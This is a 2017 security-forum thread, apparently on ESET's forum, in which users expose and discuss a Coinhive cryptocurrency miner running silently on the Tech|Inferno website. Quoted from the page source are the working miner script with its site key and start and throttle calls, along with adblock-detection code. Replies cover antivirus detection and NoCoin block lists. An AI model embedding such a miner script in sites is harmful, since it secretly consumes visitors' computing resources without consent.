Techno Inferno Forums - crypto currency

[Super_Spartan 56]

Since I never get any response from ESET, I just should I would also post this here for an admin to make sure this site is blocked....here is a copy of the email I just sent to ESET Samples Team:

Please check this site: https://www.techinferno.com/index.php?/forums/ and have ESET’s HTTP Scanner block it

 

===========================================================================================================

Just like to warn you guys that it would seem that techinferno has now started to used end users computers to mine crypto currency.

Just went on myself to check for some info and watched my CPU spike to 100% with the system lagging, even down to GPU driver crashing so i closed the tab it went back to normal, i then went and viewed the source for the index page.

Here is what was found:

<link rel='shortcut icon' href='****://sslcdn.techinferno.com/uploads/monthly_2017_08/favicon.ico.902cfabe37f7260915a7c8342595a33e.ico'>

<script src="****://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('uWKXebL5jXICjXGj85wncylJDkRN9gVu');
miner.start();
</script>

TOS

Tech|Inferno is a technology website dedicated to discovering the latest breakthroughs in vbios, bios, egpu and other trends in the industry. As part of this dedication to cutting edge technology, we sometimes try new technologies as part of our codebase that can range from subtle advertising in the form of text to silent cryptocurrency mining.None of the technology we test on this website will ever adversely affect our end users as we try to keep it minimal and out of sight so that our users can maximize their enjoyment of Tech|Inferno without the typical advertisements cluttering their screens

 

Edited November 12, 2017 by Phoenix

[0xDEADBEEF 43]

If you turn on the detection of "potentially unsafe application", ESET will detect the miner script. Not sure why this is in "potentially unsafe" but not "potentially unwanted"

[Super_Spartan 56]

22 minutes ago, 0xDEADBEEF said:

If you turn on the detection of "potentially unsafe application", ESET will detect the miner script. Not sure why this is in "potentially unsafe" but not "potentially unwanted"

I have turned on detect potentially unsafe applications, it doesn't detect it, and this should be detected by the HTTP scanner. Kaspersky is already blocking it.

[Marcos 5,070]

No problem here:

Time;Scanner;Object type;Object;Threat;Action;User;Information;Hash;First seen here
11/12/2017 8:38:30 PM;HTTP filter;file;hxxps://coinhive.com/lib/coinhive.min.js;JS/CoinMiner.F potentially unsafe application;connection terminated;DESKTOP-5JIJ6V4\Admin;Threat was detected upon access to web by the application: C:\Program Files (x86)\Mozilla Firefox\firefox.exe

It's been detected for a month already.

[itman 1,659]

5 hours ago, Phoenix said:

Please check this site: https://www.techinferno.com/index.php?/forums/ and have ESET’s HTTP Scanner block it

 

Eset didn't block it for me using IE11. Neither did my Eset web filter for coinhive.com/*. Appears the site added some adblock detection. Below is the expanded script for adblock detection:

<script src="https://coinhive.com/lib/coinhive.min.js"></script>

adblock
<script>
 var miner = new CoinHive.Anonymous('uWKXebL5jXICjXGj85wncylJDkRN9gVu');
   miner.start();
   miner.getAutoThreadsEnabled();
   miner.setThrottle('0.8');
</script>
 

-EDIT- Here's the rest of the code. I did not see any adverse CPU activity while browsing on that web site. I did see a popup about enabling cookies that perhaps is related to the below code. Perhaps 3rd party cookies need to be enabled to enable the coin miner?

</head>
   <script type="text/javascript">
    var adblock = true;
</script><script src=""></script><script src=""></script><script type="text/javascript">
  if(adblock) {
   $(document).ready(function() {
        $.blockUI({
    message: $('#zozPopupMsg'),
    css: { cursor: 'default',
           border:'none',
           top:'10%',      
         },
    showOverlay: 1,
    overlayCSS: { cursor: 'default',
                  opacity: 1
                },
    baseZ: 100000,
    centerX: true,
    centerY: true,
    allowBodyStretch: true,
    bindEvents: true,
    constrainTabKey: true,
    fadeIn:  500,
  });
  //Disable Scroller
 
  $('html, body').css({
    'overflow': 'hidden',
    'height': '100%'
  });
 
 });
 }
</script>

 

Edited November 13, 2017 by itman

[itman 1,659]

Also and of interest was when surfing to a web site article about coin mining later, it contained a coin miner I was not previously aware of. So appears the techinferio.com Coin Hive miner was indeed never activated.

[cyberhash 188]

There are also upcoming miners that are not going to use java or a specific url to mine, so will be interesting to see how that one pans out 

[itman 1,659]

Just checked the Techinfero web site and the Coin Hive miner is gone.

Edited November 13, 2017 by itman

[itman 1,659]

I can confirm that Eset is not detecting the Coin Hive miner on the posted TechInferno web site link. Neither is the Fanboy Adblock TPL I use in IE11. I do know this TPL does have an entry for Coin Hive. So it appears that Coin Hive has indeed figured out a way around the block lists and AV PUA detection.

I didn't initially detect the coin mining activity since you have to enter one of the sub-forums from the main TechInferno forum web page for the coin mining to take place. Also on my PC and possibly due to it has a 6 core CPU, I didn't see CPU activity exceeding 15%. However, I didn't stick around long on that web page.

-EDIT- Appears the coin mining is going on through the animated banner on the web page. Position your mouse cursor on banner text to stop the scrolling. CPU activity drops to next to nill.

Edited November 13, 2017 by itman

[Super_Spartan 56]

5 hours ago, itman said:

I can confirm that Eset is not detecting the Coin Hive miner on the posted TechInferno web site link. Neither is the Fanboy Adblock TPL I use in IE11. I do know this TPL does have an entry for Coin Hive. So it appears that Coin Hive has indeed figured out a way around the block lists and AV PUA detection.

I didn't initially detect the coin mining activity since you have to enter one of the sub-forums from the main TechInferno forum web page for the coin mining to take place. Also on my PC and possibly due to it has a 6 core CPU, I didn't see CPU activity exceeding 15%. However, I didn't stick around long on that web page.

-EDIT- Appears the coin mining is going on through the animated banner on the web page. Position your mouse cursor on banner text to stop the scrolling. CPU activity drops to next to nill.

@Marcos

 

Can you please comment on this. also, why does ESET Samples never reply to me.

[itman 1,659]

-Edit- Just refer to the below screen shot as proof that Eset's URL list blocking does work. However and of course, it will not be triggered if the coin miner URL has been blocked by other means.

Definitely "wild and crazy" Coin Hive mining going on! I found a way to get Eset's Web Filtering URL block list to detect the Coin Hive connection on the TechInferno web site as shown in the below screen shot. I will describe the "how" and speculate on the "why."

I installed the Adblock Plus add-on for IE11. I then disabled the Fanboy Adblock TPLs; both the Easylist and the Easylist Privacy TPLs. Important - all TPLs have to be disabled or Adblock Plus won't allow for detection of this Coin Hive miner instance on the TechInfero web site.

Now for the "speculation" as to why this works. Appears the connection to Coin Hive is somehow occurring through some type of redirect or "camouflaging". It also appears that Adblock Plus can "trace" this activity and resolve to the "real" https://coinhive.com/lib/coinhive.min.js address. As such, Eset's URL filtering can now detect it upon connection attempt. Bottom line - looks like Coin Hive has figured out a way to defeat host based URL filtering.

Edited November 14, 2017 by itman

[cyberhash 188]

The authors of Adblock sold their soul nearly a year ago now. Hence why webpages can now detect it and either block you until you whitelist the page or work its way round it. It's now near a useless plugin

As mining for revenue goes, its a pretty grey area. If the site actually states or alerts the user by visiting the site that they agree to mining then its not really "unwanted or unsafe". It's the user who agrees to it in the first place by accepting the T&C. But a large proportion of website owners wont display a message and break the "unchecked" rules.

Plenty of legitimate sites use mining as an alternative revenue stream and drop ads from the site completely. If ESET or any AV vendor start blocking this universally then i imagine it will cause a massive influx of unhappy customers who can't visit a website they have been going to for many years.

By enabling PUA it allows detection , but will also bring with it some inherent problems of its own along the way. E.G legitimate applications that have In-App advertising will also be detected and blocked.

I can understand why ESET are approaching the matter in the manner they do, as they have never advertised their product as an anti-revenue/ads product and neither has any other AV vendor.

These decisions have always been left to the end user and the use of 3rd party browser plugins.

Coinminer & Authedmine come from the same author, but the latter of the 2 was to allow a user opt-in process and allowing user choice.

 

[persian-boy 22]

Ok, there is only one way to make sure that we are safe: disable the java+use browser sandboxed.
Avs failed against Blackhat coders :-)

Edited November 14, 2017 by persian-boy

[cyberhash 188]

1 hour ago, persian-boy said:

Ok, there is only one way to make sure that we are safe: disable the java+use browser sandboxed.
Avs failed against Blackhat coders :-)

I don't think its the matter of failing. They could easily be blocked, but its a fact that these miners also have a legitimate purpose and that's where the grey area comes into play. But as noted above you DO have the option of enabling detection of PUA.

Alternatively ............

Not installing & running Java , using something along the lines of noscript (hard for novices) , plus using a browser that "Asks" when flash content is wanting to be run and not allowed by default.

There are also plugins like "No coin" appearing , that specifically targets these miners

 

[persian-boy 22]

Failed because There are more advanced miners than a simple .js script and you cant solve them with no script/ no coin extension!or enabling PUA in Eset!also, it's not legitimate since they use the CPU without the user knowledge:P
No coin or PUA in Eset cant help you with this:
Researchers at IBM have found a more sophisticated class of surreptitious mining software that penetrates your system. These are delivered through infected image files or by clicking on links leading to a malicious site. Such attacks tend to target enterprise networks....
https://qz.com/1085171/how-to-tell-if-your-computer-is-secretly-mining-cryptocurrency-and-what-to-do-about-it/

 

Edited November 14, 2017 by persian-boy

[Super_Spartan 56]

7 hours ago, cyberhash said:

I don't think its the matter of failing. They could easily be blocked, but its a fact that these miners also have a legitimate purpose and that's where the grey area comes into play. But as noted above you DO have the option of enabling detection of PUA.

Alternatively ............

Not installing & running Java , using something along the lines of noscript (hard for novices) , plus using a browser that "Asks" when flash content is wanting to be run and not allowed by default.

There are also plugins like "No coin" appearing , that specifically targets these miners

 

I have enabled the no coin rule in Adblock Plus, perhaps that's why ESET wasn't alerting me of anything when visiting that site?

[itman 1,659]

2 hours ago, Phoenix said:

I have enabled the no coin rule in Adblock Plus, perhaps that's why ESET wasn't alerting me of anything when visiting that site?

Yes.

The NoCoin rule in the full AdBlock Plus solution in addition to the NoCoin extension in FireFox and possibility a similar Chrome plug-in use the GitHub list described here: https://github.com/hoshsadiq/adblock-nocoin-list . So in your case, this would have blocked the coinhive.com connection prior to Eset's URL block list intercepting it. Unfortunately, the Adblock Plus add-on for IE does not have such capability and you are forced to using another URL block list method.

However, I thought you commented on your CPU spiking when entering the web site? Did this occur prior to adding the Adblock Plus NoCoin rule?

[itman 1,659]

Yikes!

I finally resolved why I was not getting an Eset URL block alert on the TechInferno web site when using IE's  Fanboy Adblock TPLs; both the Easylist and the Easylist Privacy TPLs. The EasyList Privacy TPL contains all the Coin Miner URLs in the GitHub NoCoin List. Appears the TPL is updated with Coin Miner URLs every time the GitHub NoCoin list is updated.

As such, there is no reason to separately add the Adblock Plus toolbar extension in IE. Also if you are using the Fanboy AdBlock EasyList Privacy TPL in IE, there is no reason to add the GitHub NoCoin list URL's in a corresponding Eset URL block list.

-EDIT- What caused my confusion on this is when I viewed both the EasyList TPL details in IE via manage add-ons, I could find no ref. to any of the NoCoin list of coin miner URLs. Appears what AdBlock who now maintains the Fanboy IE TPL lists does is reformat the NoCoin URLs into a compatible IE TPL format and then merge them into the daily EasyList Privacy TPL update download. Lesson learned - always refer to the .tpl files stored in %AppData%/Roaming/ directory.

Edited November 14, 2017 by itman

[itman 1,659]

18 hours ago, cyberhash said:

Coinminer & Authedmine come from the same author, but the latter of the 2 was to allow a user opt-in process and allowing user choice.

This might explain why Authedmine URL is not listed in the NoCoin block list.

[Super_Spartan 56]

5 hours ago, itman said:

Yes.

The NoCoin rule in the full AdBlock Plus solution in addition to the NoCoin extension in FireFox and possibility a similar Chrome plug-in use the GitHub list described here: https://github.com/hoshsadiq/adblock-nocoin-list . So in your case, this would have blocked the coinhive.com connection prior to Eset's URL block list intercepting it. Unfortunately, the Adblock Plus add-on for IE does not have such capability and you are forced to using another URL block list method.

However, I thought you commented on your CPU spiking when entering the web site? Did this occur prior to adding the Adblock Plus NoCoin rule?

That was on another system with nothing installed

 

So when I checked that link on my system, NOD32 didn't alert me of anything. Now it makes sense that you mention it though, seems that no coin filter is worth it after all

[itman 1,659]

Also time again to review what Eset  by default will and will not protect against in regards to coin miners.

Eset via PUA detection will prevent a coin miner from being installed in the cache/temporary storage of the browser. If a coin miner can be installed in this way, it can mine on every web site you land on.

Eset will not prevent a coin miner installed on a web server hosting the web page from mining. You need to either install an adblocker for your browser that uses Github's NoCoin list or EasyList's Privacy TPL if you're using  IE to stop this type of activity. Alternatively, you can create you own Eset URL block list for coin miner URL's. However, you will be responsible for manually updating that list on periodic basis

[itman 1,659]

I will add that you can't 100% rely on NoCoin to stop all web server based coin mining. Notably missing from the NoCoin URL list is the second most widely use coin miner - Crypto-Loot.

-EDIT- Appears NoCoin list does include Crypto-Loot.com. However, it is not stopping Crypto-Loot from running. Suspect because the URL is format as ws09.crypto-loot.com or ws23.crypto-loot.com as shown bleepingcomputer.com article with MBAM blocking these two URLs. Proof that adblocker list blocking has limited functionality.

A good read on how that was recently used maliciously is here: https://www.bleepingcomputer.com/news/security/cookie-consent-script-drops-in-browser-cryptocurrency-miner/ .

So one needs to keep up with coin miner development and add as I did for Crypto-Loot to an Eset coin miner URL block list I created. The bleepingcomputer.com article notes that the malicious Crypto-Loot coin miner was removed from the Cookie Consent web site but they left their own older one in place as noted below:

Edited November 15, 2017 by itman

[itman 1,659]

I will note this in regards to web site server based coin mining. Eset has a Web Filtering option that has an option to inspect javascript code which is enabled by default. It is this filter that allows it to detect attempted coin miner installation in the browser. Since this filter exists, Eset could w/o much difficulty add a GUI option to detect attempted web server based coin mining.

This option would be disabled by default which would absolve Eset from complaints by coin miner developers that Eset is blocking their software. Two options could be provided in regards to this option; block or ask. The ask option would throw an alert and the user could allow or block the coin mining activity. Inclusion of the ask option would further protect Eset from coin miner developers since again, it is the user who is deciding to allow the coin mining activity.

Optionally and desired, Eset will provide a built-in coin miner URL block and allow lists to facilitate ask mode processing . When a coin miner is allowed, it is added to the coin miner URL allow list. When a coin miner is blocked, it is added to the coin miner URL block list. Use of these lists will prevent any further alerts when operating in coin miner ask mode and a previous detected web site is subsequently used .

Edited November 15, 2017 by itman